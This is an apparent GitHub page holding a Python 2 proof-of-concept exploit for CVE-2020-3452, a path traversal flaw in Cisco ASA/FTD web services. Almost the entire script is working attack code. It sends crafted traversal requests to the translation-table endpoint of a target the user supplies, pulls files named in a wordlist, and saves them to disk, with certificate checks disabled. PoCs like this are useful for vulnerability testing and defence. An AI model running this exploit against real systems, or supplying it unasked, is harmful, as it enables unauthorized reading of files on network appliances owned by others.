-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathCVE-2020-3452.py
71 lines (60 loc) · 2.95 KB
/
CVE-2020-3452.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
import sys, ssl, os, datetime, requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from datetime import datetime
reload(sys)
sys.setdefaultencoding('utf-8')
requests.packages.urllib3.disable_warnings()
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
print "+-------------------------------------------------------------+"
print
print "- [ Cisco ASA / FTD Web Services Traversal Vulnerability ]"
print
print "- -[ CVE-2020-3452 - PoC by: LiquidSky ^_^ ]-"
print
print "+-------------------------------------------------------------+"
try:
target = sys.argv[1]
except IndexError:
print
print "- Usage: %s <vuln-site>" % sys.argv[0]
print "- Example: %s https://target" % sys.argv[0]
print
sys.exit()
files = open("cisco_asa_file_list.txt", "r")
now = datetime.now()
date_time = now.strftime("%m/%d/%Y, %H:%M:%S")
converted_list = []
for element in files:
converted_list.append(element.strip())
# check cisco vuln
def cisco_vuln():
print "[*] Checking potential target : " + target + ""
try:
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
hello = requests.get(target, headers=headers, verify=False)
print "[+] " + target + " appears to be online!"
except requests.ConnectionError:
print "[!] Error: " + target + " appears to be offline!"
sys.exit()
for x in converted_list:
payload = {'type': 'mst', 'textdomain': '+CSCOE+/' + x + '' , 'default-language':'' , 'lang':'../'}
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
request = requests.get(target + "/+CSCOT+/translation-table", params=payload, headers=headers, verify=False)
if request.status_code == 200:
print "[+] " + target + " is vulnerable... "
print "[+] Grabbing " + x + " from the host."
f = open(x,"w")
f.write(request.text)
f.close()
else:
print "[!] The file " + x + " does not exist or " + target + " is not vulnerable!"
def main():
if cisco_vuln():
print "[*] Looks like you got all the files, Cheers!"
print "[*] Current Time Stamp: ",date_time
else:
print "[-] Either this was a complete fail.. or some of the files didn't download (which is common)"
print "[*] Current Time Stamp: ",date_time
if __name__ == "__main__":
main()